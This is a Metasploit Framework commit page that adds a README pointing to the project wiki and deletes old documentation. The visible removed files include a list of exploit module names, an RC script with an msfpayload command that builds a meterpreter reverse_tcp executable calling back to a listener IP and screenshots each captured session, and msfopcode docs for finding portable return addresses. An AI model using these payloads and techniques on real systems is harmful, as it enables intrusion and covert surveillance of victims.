Browse Source

Squashed commit of the following:

commit 7f659547b3
Author: Tod Beardsley <todb@metasploit.com>
Date:   Mon Dec 1 07:54:53 2014 -0600

    Add a pointer to true and correct docs

    See #4000. Seems kind of pointless to ship all these bytes when we host
    everything on GitHub and provide tools to generate docs yourself.

commit 01668c8529
Author: Tod Beardsley <todb@metasploit.com>
Date:   Mon Dec 1 07:39:11 2014 -0600

    Remove old documentation

    The last significant commit in this directory was a844b5c3 , which
    touched a sample browser module. Before that, changes were either
    ranging across the codebase, or surgical removal of out of date
    documentation.

    This all is looking to me like fairly useless historical artifacts.

    See #4000 for more discussion.
Tod Beardsley 5 years ago
parent
commit
4c880629c3
No account linked to committer's email address
39 changed files with 34 additions and 11629 deletions
  1. 34
    0
      documentation/README.md
  2. 0
    7520
      documentation/developers_guide.pdf
  3. 0
    1
      documentation/gendocs.sh
  4. 0
    5
      documentation/metasploit2/README
  5. 0
    161
      documentation/metasploit2/exploits.txt
  6. 0
    49
      documentation/msfconsole_rc_ruby_example.rc
  7. 0
    338
      documentation/msfopcode.txt
  8. 0
    166
      documentation/msfrpc.txt
  9. 0
    77
      documentation/posix_meterpreter.txt
  10. 0
    87
      documentation/rpm/metasploit.spec
  11. 0
    34
      documentation/samples/framework/dump_module_info.rb
  12. 0
    30
      documentation/samples/framework/encode_file.rb
  13. 0
    20
      documentation/samples/framework/enumerate_modules.rb
  14. 0
    52
      documentation/samples/framework/run_exploit_using_base.rb
  15. 0
    68
      documentation/samples/framework/run_exploit_using_core.rb
  16. 0
    45
      documentation/samples/modules/auxiliary/sample.rb
  17. 0
    35
      documentation/samples/modules/encoders/sample.rb
  18. 0
    149
      documentation/samples/modules/exploits/ie_browser.rb
  19. 0
    85
      documentation/samples/modules/exploits/sample.rb
  20. 0
    34
      documentation/samples/modules/nops/sample.rb
  21. 0
    34
      documentation/samples/modules/payloads/singles/sample.rb
  22. 0
    40
      documentation/samples/modules/post/sample.rb
  23. 0
    207
      documentation/samples/pro/msfrpc_pro_discover.rb
  24. 0
    225
      documentation/samples/pro/msfrpc_pro_exploit.rb
  25. 0
    91
      documentation/samples/pro/msfrpc_pro_import.rb
  26. 0
    148
      documentation/samples/pro/msfrpc_pro_nexpose.rb
  27. 0
    43
      documentation/samples/scripts/meterpreter_script_template.rb
  28. 0
    132
      documentation/samples/scripts/resource_script.rb
  29. 0
    5
      documentation/samples/vulnapps/exploitme-posix/Makefile
  30. 0
    105
      documentation/samples/vulnapps/exploitme-posix/exploitme-posix.c
  31. 0
    18
      documentation/samples/vulnapps/php/test.php
  32. 0
    17
      documentation/samples/vulnapps/testsrv/Makefile
  33. 0
    2
      documentation/samples/vulnapps/testsrv/README
  34. 0
    129
      documentation/samples/vulnapps/testsrv/testsrv.c
  35. BIN
      documentation/samples/vulnapps/testsrv/testsrv.exe
  36. 0
    910
      documentation/users_guide.tex
  37. BIN
      documentation/users_guide_4.2.pdf
  38. BIN
      documentation/users_guide_4.3.pdf
  39. 0
    567
      documentation/wmap.txt

+ 34
- 0
documentation/README.md View File

@@ -0,0 +1,34 @@
1
+# Metasploit Developer Documentation
2
+
3
+*(last updated December 1, 2014)
4
+
5
+Metasploit is actively supported by a community of hundreds of
6
+contributors and thousands of users world-wide. As a result, the
7
+accompanying documentation moves quite quickly.
8
+
9
+The best source of documentation on Metasploit development is
10
+https://github.com/rapid7/metasploit-framework/wiki. There are many
11
+treasures there, such as:
12
+
13
+  * [Evading Antivirus](https://github.com/rapid7/metasploit-framework/wiki/Evading-Anti-Virus)
14
+  * [How Payloads Work](https://github.com/rapid7/metasploit-framework/wiki/How-payloads-work)
15
+  * [How to use Datastore Options](https://github.com/rapid7/metasploit-framework/wiki/How-to-use-datastore-options)
16
+  * [How to write browser exploits with BES](https://github.com/rapid7/metasploit-framework/wiki/How-to-write-a-browser-exploit-using-BrowserExploitServer)
17
+  * [How to write a bruteforcer](https://github.com/rapid7/metasploit-framework/wiki/How-to-use-Msf%3A%3AAuxiliary%3A%3AAuthBrute-to-write-a-bruteforcer)
18
+
19
+...and many, many more.
20
+
21
+## API Documentation
22
+
23
+If you are looking for API documentation, you may run `rake yard` to
24
+generate a navigatable view of the comment documentation used throughout
25
+Metasploit, or visit https://rapid7.github.io/metasploit-framework/api
26
+for a recently generated online version.
27
+
28
+## Contributing
29
+
30
+If you would like to contribute to the documentation effort, please see
31
+http://yardoc.org/ for details on how to write YARD-compatible comments,
32
+and send us a [Pull Request](https://github.com/rapid7/metasploit-framework/pulls)
33
+with your contribution.
34
+

+ 0
- 7520
documentation/developers_guide.pdf
File diff suppressed because it is too large
View File


+ 0
- 1
documentation/gendocs.sh View File

@@ -1 +0,0 @@
1
-rake yard

+ 0
- 5
documentation/metasploit2/README View File

@@ -1,5 +0,0 @@
1
-This directory contains 2.7 -> 3.0 compatibility information.
2
-
3
-
4
-Exploit Modules: exploits.txt
5
-Payload Modules: payloads.txt

+ 0
- 161
documentation/metasploit2/exploits.txt View File

@@ -1,161 +0,0 @@
1
-Unfinished modules
2
-==================
3
-
4
-	arkeia_agent_access
5
-	gnu_mailutils_imap4d
6
-	hpux_ftpd_preauth_list
7
-	iis_source_dumper
8
-	phpnuke_search_module
9
-	realvnc_41_bypass
10
-	solaris_snmpxdmid
11
-	sygate_policy_manager
12
-	uow_imap4_copy
13
-	uow_imap4_lsub - partially (linux/imap/imap_uw_lsub.rb)
14
-	wzdftpd_sitem
15
-
16
-
17
-Completed modules
18
-=================
19
-
20
-	afp_loginext exploit/osx/afp/loginext
21
-	aim_goaway exploit/windows/browser/aim_goaway
22
-	altn_webadmin exploit/windows/http/altn_webadmin
23
-	apache_chunked_win32 exploit/windows/http/apache_chunked
24
-	arkeia_type77_macos exploit/osx/arkeia/type77
25
-	arkeia_type77_win32 exploit/windows/arkeia/type77
26
-	awstats_configdir_exec exploit/unix/webapp/awstats_configdir_exec
27
-	barracuda_img_exec exploit/unix/webapp/barracuda_img_exec
28
-	backupexec_agent exploit/windows/backupexec/remote_agent
29
-	backupexec_dump auxiliary/admin/backupexec/dump
30
-	backupexec_ns exploit/windows/backupexec/name_service
31
-	backupexec_registry auxiliary/admin/backupexec/registry
32
-	badblue_ext_overflow exploit/windows/http/badblue_ext_overflow
33
-	bakbone_netvault_heap exploit/windows/misc/bakbone_netvault_heap
34
-	blackice_pam_icq exploit/windows/firewall/blackice_pam_icq
35
-	bluecoat_winproxy exploit/windows/proxy/bluecoat_winproxy_host
36
-	bomberclone_overflow_win32 exploit/windows/misc/bomberclone_overflow
37
-	cabrightstor_disco exploit/windows/brightstor/discovery_udp
38
-	cabrightstor_disco_servicepc exploit/windows/brightstor/discovery_tcp
39
-	cabrightstor_sqlagent exploit/windows/brightstor/sql_agent
40
-	cabrightstor_uniagent exploit/windows/brightstor/universal_agent
41
-	cacam_logsecurity_win32 exploit/windows/unicenter/cam_log_security
42
-	cacti_graphimage_exec exploit/unix/webapp/cacti_graphimage_exec
43
-	calicclnt_getconfig exploit/windows/license/calicclnt_getconfig
44
-	calicserv_getconfig exploit/windows/license/calicserv_getconfig
45
-	cesarftp_mkd exploit/windows/ftp/cesarftp_mkd
46
-	distcc_exec exploit/unix/misc/distcc_exec
47
-	edirectory_imonitor exploit/windows/http/edirectory_imonitor
48
-	edirectory_imonitor2 exploit/windows/http/edirectory_host
49
-	eiq_license exploit/windows/misc/eiqnetworks_esa
50
-	eudora_imap exploit/windows/imap/eudora_list
51
-	exchange2000_xexch50 exploit/windows/smtp/ms03_046_exchange2000_xexch50
52
-	firefox_queryinterface_linux exploit/multi/browser/firefox_queryinterface
53
-	firefox_queryinterface_osx exploit/multi/browser/firefox_queryinterface
54
-	freeftpd_user exploit/windows/ftp/freeftpd_user
55
-	freesshd_key_exchange exploit/windows/ssh/freesshd_key_exchange
56
-	freeftpd_key_exchange exploit/windows/ftp/freeftpd_key_exchange
57
-	futuresoft_tftpd exploit/windows/tftp/futuresoft_transfermode
58
-	globalscapeftp_user_input exploit/windows/ftp/globalscapeftp_input
59
-	google_proxystylesheet_exec exploit/unix/webapp/google_proxystylesheet_exec
60
-	hpux_lpd_exec exploit/hpux/lpd/cleanup_exec
61
-	ia_webmail exploit/windows/http/ia_webmail
62
-	icecast_header exploit/windows/http/icecast_header
63
-	ie_objecttype exploit/windows/browser/ms03_020_ie_objecttype
64
-	ie_vml_rectfill exploit/windows/browser/ms06_055_vml_method
65
-	ie_webview_setslice exploit/windows/browser/ms06_057_webview_setslice
66
-	ie_xp_pfv_metafile exploit/windows/browser/ms06_001_wmf_setabortproc
67
-	ie_createtextrange exploit/windows/browser/ms06_013_createtextrange
68
-	ie_iscomponentinstalled exploit/windows/browser/ie_iscomponentinstalled
69
-	ie_createobject exploit/windows/browser/ie_createobject
70
-	iis40_htr exploit/windows/iis/ms02_018_htr
71
-	iis50_printer_overflow exploit/windows/iis/ms01_023_printer
72
-	iis50_webdav_ntdll exploit/windows/iis/ms03_007_ntdll_webdav
73
-	iis_fp30reg_chunked exploit/windows/isapi/fp30reg_chunked
74
-	iis_nsiislog_post exploit/windows/isapi/nsiislog_post
75
-	iis_w3who_overflow exploit/windows/isapi/w3who_query
76
-	imail_imap_delete exploit/windows/imap/imail_delete
77
-	imail_ldap exploit/windows/ldap/imail_thc
78
-	irix_lpsched_exec exploit/irix/lpd/tagprinter_exec
79
-	kerio_auth exploit/windows/firewall/kerio_auth
80
-	lsass_ms04_011 exploit/windows/smb/ms04_011_lsass
81
-	mailenable_auth_header exploit/windows/http/mailenable_auth_header
82
-	mailenable_imap exploit/windows/imap/mailenable_status
83
-	mailenable_imap_w3c exploit/windows/imap/mailenable_w3c_select
84
-	maxdb_webdbm_get_overflow exploit/windows/http/maxdb_webdbm_get_overflow
85
-	mcafee_epolicy_source exploit/windows/http/mcafee_epolicy_source
86
-	mdaemon_imap_cram_md5 exploit/windows/imap/mdaemon_cram_md5
87
-	mercantec_softcart exploit/bsdi/softcart/mercantec_softcart
88
-	mercur_imap_select_overflow exploit/windows/imap/mercur_imap_select_overflow
89
-	mercury_imap exploit/windows/imap/mercury_rename
90
-	minishare_get_overflow exploit/windows/http/minishare_get_overflow
91
-	mozilla_compareto exploit/multi/browser/mozilla_compareto
92
-	ms05_030_nntp exploit/windows/nntp/ms05_030_nntp
93
-	ms05_039_pnp exploit/windows/smb/ms05_039_pnp
94
-	msasn1_ms04_007_killbill exploit/windows/smb/ms04_007_killbill
95
-	msmq_deleteobject_ms05_017 exploit/windows/dcerpc/ms05_017_msmq
96
-	msrpc_dcom_ms03_026 exploit/windows/dcerpc/ms03_026_dcom
97
-	mssql2000_preauthentication exploit/windows/mssql/ms02_056_hello
98
-	mssql2000_resolution exploit/windows/mssql/ms02_039_slammer
99
-	netapi_ms06_040 exploit/windows/smb/ms06_040_netapi
100
-	netterm_netftpd_user_overflow exploit/windows/ftp/netterm_netftpd_user
101
-	niprint_lpd exploit/windows/lpd/niprint
102
-	novell_messenger_acceptlang exploit/windows/http/novell_messenger_acceptlang
103
-	openview_connectednodes_exec exploit/unix/webapp/openview_connectednodes_exec
104
-	openview_omniback_exec exploit/unix/misc/openview_omniback_exec
105
-	oracle9i_xdb_ftp exploit/windows/ftp/oracle9i_xdb_ftp_unlock
106
-	oracle9i_xdb_ftp_pass exploit/windows/ftp/oracle9i_xdb_ftp_pass
107
-	oracle9i_xdb_http exploit/windows/http/oracle9i_xdb_pass
108
-	pajax_remote_exec exploit/unix/webapp/pajax_remote_exec
109
-	payload_handler exploit/multi/handler
110
-	peercast_url_linux exploit/linux/http/peercast_url
111
-	peercast_url_win32 exploit/windows/http/peercast_url
112
-	php_wordpress_lastpost exploit/unix/webapp/php_wordpress_lastpost
113
-	php_vbulletin_template exploit/unix/webapp/php_vbulletin_template
114
-	php_xmlrpc_eval exploit/unix/webapp/php_xmlrpc_eval
115
-	phpbb_highlight exploit/unix/webapp/phpbb_highlight
116
-	poptop_negative_read exploit/linux/pptp/poptop_negative_read
117
-	privatewire_gateway_win32 exploit/windows/http/privatewire_gateway
118
-	putty_ssh exploit/windows/ssh/putty_msg_debug
119
-	realserver_describe_linux exploit/multi/realserver/describe
120
-	realvnc_client exploit/windows/vnc/realvnc_client
121
-	rras_ms06_025 exploit/windows/smb/ms06_025_rras
122
-	rras_ms06_025_rasman exploit/windows/smb/ms06_025_rasmans_reg
123
-	rsa_iiswebagent_redirect exploit/windows/isapi/rsa_webagent_redirect
124
-	safari_safefiles_exec exploit/osx/browser/safari_metadata_archive
125
-	samba_nttrans exploit/multi/samba/nttrans
126
-	samba_trans2open_osx exploit/osx/samba/trans2open
127
-	samba_trans2open_solsparc exploit/solaris/samba/trans2open
128
-	sambar6_search_results exploit/windows/http/sambar6_search_results
129
-	smb_sniffer auxiliary/server/capture/smb
130
-	seattlelab_mail_55 exploit/windows/pop3/seattelab_pass
131
-	securecrt_ssh1 exploit/windows/ssh/securecrt_ssh1
132
-	sentinel_lm7_overflow exploit/windows/license/sentinel_lm7_udp
133
-	servu_mdtm_overflow exploit/windows/ftp/servu_mdtm
134
-	shixxnote_font exploit/windows/misc/shixxnote_font
135
-	shoutcast_format_win32 exploit/windows/http/shoutcast_format
136
-	slimftpd_list_concat exploit/windows/ftp/slimftpd_list_concat
137
-	solaris_dtspcd_noir exploit/solaris/dtspcd/heap_noir
138
-	solaris_lpd_exec exploit/solaris/lpd/sendmail_exec
139
-	solaris_lpd_unlink auxiliary/dos/solaris/lpd/cascade_delete
140
-	solaris_sadmind_exec exploit/solaris/sunrpc/solaris_sadmind_exec
141
-	solaris_ttyprompt exploit/solaris/telnet/ttyprompt
142
-	sphpblog_file_upload exploit/unix/webapp/sphpblog_file_upload
143
-	squid_ntlm_authenticate exploit/linux/proxy/squid_ntlm_authenticate
144
-	svnserve_date exploit/multi/svn/svnserve_date
145
-	sybase_easerver exploit/windows/http/sybase_easerver
146
-	tftpd32_long_filename exploit/windows/tftp/tftpd32_long_filename
147
-	trackercam_phparg_overflow exploit/windows/http/trackercam_phparg_overflow
148
-	ultravnc_client exploit/windows/vnc/ultravnc_client
149
-	ut2004_secure_linux exploit/linux/games/ut2004_secure
150
-	ut2004_secure_win32 exploit/windows/games/ut2004_secure
151
-	warftpd_165_user exploit/windows/ftp/warftpd_165_user
152
-	warftpd_165_pass exploit/windows/ftp/warftpd_165_pass
153
-	webstar_ftp_user exploit/osx/ftp/webstar_ftp_user
154
-	winamp_playlist_unc exploit/windows/browser/winamp_playlist_unc
155
-	windows_ssl_pct exploit/windows/ssl/ms04_011_pct
156
-	wins_ms04_045 exploit/windows/wins/ms04_045_wins
157
-	wmailserver_smtp exploit/windows/smtp/wmailserver
158
-	wsftp_server_503_mkd exploit/windows/ftp/wsftp_server_503_mkd
159
-	ypops_smtp exploit/windows/smtp/ypops_overflow1
160
-	zenworks_desktop_agent exploit/windows/novell/zenworks_desktop_agent
161
-

+ 0
- 49
documentation/msfconsole_rc_ruby_example.rc View File

@@ -1,49 +0,0 @@
1
-#
2
-# Quick RC script to demonstrate the Ruby blocks in RC files
3
-#
4
-
5
-#
6
-# Generate a corresponding EXE using msfpayload (change 192.168.0.228 to your IP):
7
-# $ msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.228 LPORT=4444 X > reverse.exe
8
-#
9
-
10
-use exploit/multi/handler
11
-set PAYLOAD windows/meterpreter/reverse_tcp
12
-set LPORT 4444
13
-set LHOST 192.168.0.228
14
-set ExitOnSession false
15
-
16
-exploit -j
17
-
18
-# The first sleep below is not necessary, but makes the output cleaner
19
-<ruby>
20
-	sleep(1)
21
-
22
-	print_status("Waiting on an incoming sessions...")
23
-	while (true)
24
-		framework.sessions.each_pair do |sid,s|
25
-			thost = s.session_host
26
-
27
-			# Ensure that stdapi has been loaded before running
28
-			if s.ext.aliases['stdapi']
29
-				print_status("Screenshotting session #{sid} #{thost}...")
30
-				s.console.run_single("screenshot -p #{thost}_#{sid}.jpg -v false -q 85")
31
-				print_status("Closing session #{sid} #{thost}...")
32
-				s.kill
33
-			else
34
-				print_status("Session #{sid} #{thost} active, but not yet configured")
35
-			end
36
-
37
-		end
38
-		sleep(1)
39
-	end
40
-
41
-	print_status("All done")
42
-</ruby>
43
-
44
-# Kill all open sessions
45
-sessions -K
46
-
47
-# Exit the console (optional)
48
-exit
49
-

+ 0
- 338
documentation/msfopcode.txt View File

@@ -1,338 +0,0 @@
1
-Using the Opcode Database CLI (msfopcode)
2
-
3
-   The 3.0 version of the Metasploit Framework comes with a command line
4
-   interface to the Metasploit Opcode Database. This can be used instead
5
-   of the web-based wizard to easily search for portable opcode
6
-   addresses. The interface is provided through the msfopcode command
7
-   which is found in the root directory of the installation. This
8
-   interface is merely a front-end to a the
9
-   Rex::Exploitation::OpcodeDb::Client class interface that interfaces
10
-   with a HTTP-based XML protocol running on the Metasploit.com
11
-   web-server.
12
-
13
-   The interface itself provides a simplified interface to some of the
14
-   different aspects of the opcode database. When running the command
15
-   with no arguments, the following output is shown:
16
-
17
-$ ./msfopcode
18
-
19
-    Usage: msfopcode command
20
-
21
-SUPPORTED COMMANDS
22
-
23
-   stats       Display database statistics
24
-   locales     Display supported locales
25
-   metatypes   Display supported opcode meta types (Ex: jmp reg)
26
-   groups      Display supported opcode groups (Ex: esp => eip)
27
-   types       Display supported opcode types (Ex: jmp esp)
28
-   platforms   Display supported platforms
29
-   modules     Display information about specific modules
30
-   search      Search for opcodes given a set of criteria
31
-
32
-   The purpose of the stats command is to show the current database
33
-   statistics, such as the number of opcodes and modules currently
34
-   indexed by the database and the last time the database was updated.
35
-   The output to this command looks something like this:
36
-
37
-$ ./msfopcode stats
38
-
39
-Last Updated             : Sat Sep 03 01:32:00 CDT 2005
40
-Number of Opcodes        : 12177419
41
-Number of Opcode Types   : 320
42
-Number of Platforms      : 14
43
-Number of Architectures  : 1
44
-Number of Modules        : 17683
45
-Number of Module Segments: 71457
46
-Number of Module Imports : 2065492
47
-Number of Module Exports : 927637
48
-
49
-   The locales command lists the locales that are currently supported by
50
-   the database. In the future, more locales will be indexed to provided
51
-   a more complete view of opcode portability.
52
-
53
-$ ./msfopcode locales
54
-English
55
-French
56
-
57
-   The metatypes command lists the opcode meta types currently supported
58
-   by the database. An opcode meta type is defined as a general
59
-   categorization of opcodes based on the action they perform, such as
60
-   jumping to a register, performing a pop/pop/ret, and so on. The meta
61
-   type helps categorize different specific types of opcodes.
62
-
63
-$ ./msfopcode metatypes
64
-pop/pop/ret
65
-jmp reg
66
-call reg
67
-jmp [reg + offset]
68
-call [reg + offset]
69
-popad/ret
70
-popaw/ret
71
-push reg/ret
72
-
73
-   The groups command lists the opcode groups currently supported by the
74
-   database. The distinction between and opcode group and an opcode meta
75
-   type is that an opcode group associates opcodes based on the specific
76
-   action they perform, such as transitioning the instruction pointer to
77
-   the current value of a specific register, like esp.
78
-
79
-$ ./msfopcode groups
80
-eax => eip
81
-ebx => eip
82
-ecx => eip
83
-edx => eip
84
-edi => eip
85
-esi => eip
86
-ebp => eip
87
-esp => eip
88
-[esp + 8] => eip
89
-[reg + offset] => eip
90
-[esp + 0x10] => eip
91
-[esp + 0x20] => eip
92
-[reg] => eip
93
-
94
-   The types command lists all of the various specific opcode types
95
-   supported by the database. An opcode type is an instance of a specific
96
-   opcode or opcodes that form one logical instruction block, such as a
97
-   jmp esp. Opcode types are grouped together through the use of opcode
98
-   groups and meta types. A sampling of the output is shown below:
99
-
100
-$ ./msfopcode types
101
-jmp esp
102
-call esp
103
-push esp, ret
104
-jmp ebp
105
-call ebp
106
-push ebp, ret
107
-jmp eax
108
-...
109
-
110
-   The platforms command lists the currently supported operating system
111
-   versions broken down by major version and service pack. At this point,
112
-   the database supports Windows NT SP3 through Windows 2003 Server SP1.
113
-   The database does not take into account hot fixes. Optionally,
114
-   platforms can be filtered by specifying the -p option with an argument
115
-   that includes a text portion of the operating system name or version
116
-   to filter. For instance, specifying -p 2000 will return only Windows
117
-   2000 versions.
118
-
119
-$ ./msfopcode platforms
120
-Windows NT 4.0.3.0 SP3 (IA32)
121
-Windows NT 4.0.4.0 SP4 (IA32)
122
-Windows NT 4.0.5.0 SP5 (IA32)
123
-Windows NT 4.0.6.0 SP6 (IA32)
124
-Windows 2000 5.0.0.0 SP0 (IA32)
125
-Windows 2000 5.0.1.0 SP1 (IA32)
126
-Windows 2000 5.0.2.0 SP2 (IA32)
127
-Windows 2000 5.0.3.0 SP3 (IA32)
128
-Windows 2000 5.0.4.0 SP4 (IA32)
129
-Windows XP 5.1.0.0 SP0 (IA32)
130
-Windows XP 5.1.1.0 SP1 (IA32)
131
-Windows XP 5.1.2.0 SP2 (IA32)
132
-Windows 2003 Server 5.2.0.0 SP0 (IA32)
133
-Windows 2003 Server 5.2.1.0 SP1 (IA32)
134
-
135
-   One of the major features of the opcode database is that it indexes
136
-   detailed information about modules. For instance, the opcode database
137
-   currently contains information about imports, exports, segments, and
138
-   specific module attributes for every imported module in the database.
139
-   This makes it possible to cross reference different modules and do all
140
-   sorts of fun things. To extract information about modules, the modules
141
-   command can be used. The usage for this command is shown below:
142
-
143
-$ ./msfopcode modules -h
144
-
145
-    Usage: msfopcode modules
146
-
147
-OPTIONS:
148
-
149
-    -E        Include module export information
150
-    -I        Include module import information
151
-    -S        Include module segment information
152
-    -d        Display detailed output
153
-    -h        Help banner
154
-    -l   A comma separated list of locales to filter (Ex: English)
155
-    -m   A comma separated list of module names to filter (Ex: kernel32.dll,use
156
-r32.dll)
157
-    -p   A comma separated list of operating system names to filter (Ex: 2000,X
158
-P)
159
-    -x        Dump the raw XML response
160
-
161
-   The explanation in the usage for each option is fairly self
162
-   explanatory, but the basic idea is that it's possible to search the
163
-   database for modules with the ability to filter based on file name,
164
-   locale, and operating system version. For the results that are
165
-   returned, information about the module imports, exports, segments, and
166
-   detailed information can be displayed. For example, to see all of the
167
-   versions of kernel32.dll currently indexed in the database, the
168
-   following command would be run:
169
-
170
-$ ./msfopcode modules -m kernel32.dll
171
-
172
-Matching Modules
173
-================
174
-
175
-    Name          Base Address  Size     Version           Timestamp
176
-          Locale
177
-    ----          ------------  ----     -------           ---------
178
-          ------
179
-    kernel32.dll  0x77e70000    790528   5.0.2191.1        Tue Dec 14 17:20:09 CST 1999  French
180
-    kernel32.dll  0x77e40000    1056768  5.2.3790.1830031  Thu Mar 24 20:30:42 CST 2005  English
181
-    kernel32.dll  0x77e40000    999424   5.2.3790.3        Tue Mar 25 03:42:44 CST 2003  English
182
-    kernel32.dll  0x77f00000    385024   4.0.0.0           Fri Apr 25 15:33:31 CDT 1997  English
183
-    kernel32.dll  0x77ef0000    421888   4.0.0.0           Mon Mar 29 18:10:58 CST 1999  English
184
-    kernel32.dll  0x77f00000    385024   4.0.0.0           Sun Feb 28 17:49:07 CST 1999  English
185
-    kernel32.dll  0x77f00000    385024   4.0.0.0           Tue Jul 20 18:19:59 CDT 1999  English
186
-    kernel32.dll  0x77e80000    745472   5.0.2191.1        Wed Dec 01 01:37:24 CST 1999  English
187
-    kernel32.dll  0x77e80000    741376   5.0.2195.1600     Fri Jun 09 21:03:14 CDT 2000  English
188
-    kernel32.dll  0x77e80000    741376   5.0.2195.2778     Fri May 04 17:34:08 CDT 2001  English
189
-    kernel32.dll  0x77e80000    745472   5.0.2195.5400     Tue Jul 23 03:13:13 CDT 2002  English
190
-    kernel32.dll  0x7c4e0000    757760   5.0.2195.6688     Thu Jun 19 22:43:40 CDT 2003  English
191
-    kernel32.dll  0x77e60000    937984   5.1.2600.0        Sat Aug 18 01:33:02 CDT 2001  English
192
-    kernel32.dll  0x77e60000    942080   5.1.2600.11061    Thu Aug 29 06:40:40 CDT 2002  English
193
-    kernel32.dll  0x7c800000    999424   5.1.2600.21802    Wed Aug 04 03:56:36 CDT 2004  English
194
- 
195
-   If only the versions of kernel32.dll on Windows XP running on the
196
-   English locale were of concern, the results could be limited by
197
-   specifying more limiting parameters:
198
-$ ./msfopcode modules -m kernel32.dll -p XP -l English
199
-
200
-Matching Modules
201
-================
202
-
203
-    Name          Base Address  Size    Version         Timestamp
204
-       Locale
205
-    ----          ------------  ----    -------         ---------
206
-       ------
207
-    kernel32.dll  0x77e60000    937984  5.1.2600.0      Sat Aug 18 01:33:02 CDT 2001  English
208
-    kernel32.dll  0x77e60000    942080  5.1.2600.11061  Thu Aug 29 06:40:40 CDT 2002  English
209
-    kernel32.dll  0x7c800000    999424  5.1.2600.21802  Wed Aug 04 03:56:36 CDT 2004  English
210
-
211
-   To display detailed information about modules that match, the -d
212
-   parameter can be specified:
213
-
214
-$ ./msfopcode modules -m kernel32.dll -p XP -l English -d
215
-.-============================================
216
-
217
-  Name        : kernel32.dll
218
-  Base Address: 0x77e60000
219
-  Size        : 937984
220
-  Version     : 5.1.2600.0
221
-  Timestamp   : Sat Aug 18 01:33:02 CDT 2001
222
-  Locale      : English
223
-  Platforms   :
224
-
225
-    Windows XP 5.1.0.0 SP0 (IA32)
226
-
227
-.-============================================
228
-
229
-  Name        : kernel32.dll
230
-  Base Address: 0x77e60000
231
-  Size        : 942080
232
-  Version     : 5.1.2600.11061
233
-  Timestamp   : Thu Aug 29 06:40:40 CDT 2002
234
-  Locale      : English
235
-  Platforms   :
236
-
237
-    Windows XP 5.1.1.0 SP1 (IA32)
238
-
239
-.-============================================
240
-
241
-  Name        : kernel32.dll
242
-  Base Address: 0x7c800000
243
-  Size        : 999424
244
-  Version     : 5.1.2600.21802
245
-  Timestamp   : Wed Aug 04 03:56:36 CDT 2004
246
-  Locale      : English
247
-  Platforms   :
248
-
249
-    Windows XP 5.1.2.0 SP2 (IA32)
250
-
251
-   The real purpose behind the opcode database, however, is the ability
252
-   to search for specific opcodes across different operating system
253
-   versions with the ability to cross reference results in order to
254
-   determine return address portability. For that reason, the msfopcode
255
-   script provides the search command:
256
-$ ./msfopcode search -h
257
-
258
-    Usage: msfopcode search
259
-
260
-OPTIONS:
261
-
262
-    -M   A comma separated list of opcode meta types to filter (Ex: jmp reg)
263
-    -P   Results must span more than one operating system version
264
-    -a   A comma separated list of addresses to filter (Ex: 0x41424344)
265
-    -g   A comma separated list of opcode groups to filter (Ex: esp => eip)
266
-    -h   Help banner
267
-    -l   A comma separated list of locales to filter (Ex: English)
268
-    -m   A comma separated list of module names to filter (Ex: kernel32.dll,user32.dll)
269
-    -p   A comma separated list of operating system names to filter (Ex: 2000,XP)
270
-    -t   A semi-colon separated list of opcode types to filter (Ex: jmp esp,call esp)
271
-    -x   Dump the raw XML response
272
-
273
-   Like the modules command, the search command provides a way of
274
-   limiting the results that come back as a result of the search. In this
275
-   case, opcode results can be limited based on meta type, group, type,
276
-   operating system, module, locale, and even address. This makes it
277
-   possible to get fairly granular results in an intuitive manner.
278
-   Furthermore, the server can be instructed to only return results that
279
-   are portable in the event that the -P option is specified, although
280
-   there are currently some issues with this option being accurate.
281
-
282
-   To search for all occurrences of a ecx => eip opcode group in
283
-   ws2help.dll on Windows 2000 and XP, the following command could be
284
-   issued:
285
-
286
-$ ./msfopcode search -p 2000,XP -m ws2help.dll -g "ecx => eip"
287
-
288
-Opcodes
289
-=======
290
-
291
-    Address     Type           OS
292
-    -------     ----           --
293
-    0x74fa3112  call ecx       Windows 2000 5.0.0.0 SP0 (IA32) (ws2help.dll)
294
-                               Windows 2000 5.0.1.0 SP1 (IA32) (ws2help.dll)
295
-                               Windows 2000 5.0.2.0 SP2 (IA32) (ws2help.dll)
296
-                               Windows 2000 5.0.4.0 SP4 (IA32) (ws2help.dll)
297
-    0x71aa1224  push ecx, ret  Windows XP 5.1.0.0 SP0 (IA32) (ws2help.dll)
298
-                               Windows XP 5.1.1.0 SP1 (IA32) (ws2help.dll)
299
-    0x71aa396d  call ecx       Windows XP 5.1.0.0 SP0 (IA32) (ws2help.dll)
300
-                               Windows XP 5.1.1.0 SP1 (IA32) (ws2help.dll)
301
-    0x71aa3de3  call ecx       Windows XP 5.1.2.0 SP2 (IA32) (ws2help.dll)
302
-    0x71aa163b  push ecx, ret  Windows XP 5.1.2.0 SP2 (IA32) (ws2help.dll)
303
-    0x75023112  call ecx       Windows 2000 5.0.0.0 SP0 (IA32) (ws2help.dll)
304
-                               Windows 2000 5.0.1.0 SP1 (IA32) (ws2help.dll)
305
-                               Windows 2000 5.0.2.0 SP2 (IA32) (ws2help.dll)
306
-                               Windows 2000 5.0.3.0 SP3 (IA32) (ws2help.dll)
307
-                               Windows 2000 5.0.4.0 SP4 (IA32) (ws2help.dll)
308
-
309
-   To limit the results to portable ones only, the -P option can be
310
-   tagged on producing output like that shown below:
311
-
312
-$ ./msfopcode search -p 2000,XP -m ws2help.dll -g "ecx => eip" -P
313
-
314
-Opcodes
315
-=======
316
-
317
-    Address     Type           OS
318
-    -------     ----           --
319
-    0x74fa3112  call ecx       Windows 2000 5.0.0.0 SP0 (IA32) (ws2help.dll)
320
-                               Windows 2000 5.0.1.0 SP1 (IA32) (ws2help.dll)
321
-                               Windows 2000 5.0.2.0 SP2 (IA32) (ws2help.dll)
322
-                               Windows 2000 5.0.4.0 SP4 (IA32) (ws2help.dll)
323
-    0x71aa1224  push ecx, ret  Windows XP 5.1.0.0 SP0 (IA32) (ws2help.dll)
324
-                               Windows XP 5.1.1.0 SP1 (IA32) (ws2help.dll)
325
-    0x71aa396d  call ecx       Windows XP 5.1.0.0 SP0 (IA32) (ws2help.dll)
326
-                               Windows XP 5.1.1.0 SP1 (IA32) (ws2help.dll)
327
-    0x75023112  call ecx       Windows 2000 5.0.0.0 SP0 (IA32) (ws2help.dll)
328
-                               Windows 2000 5.0.1.0 SP1 (IA32) (ws2help.dll)
329
-                               Windows 2000 5.0.2.0 SP2 (IA32) (ws2help.dll)
330
-                               Windows 2000 5.0.3.0 SP3 (IA32) (ws2help.dll)
331
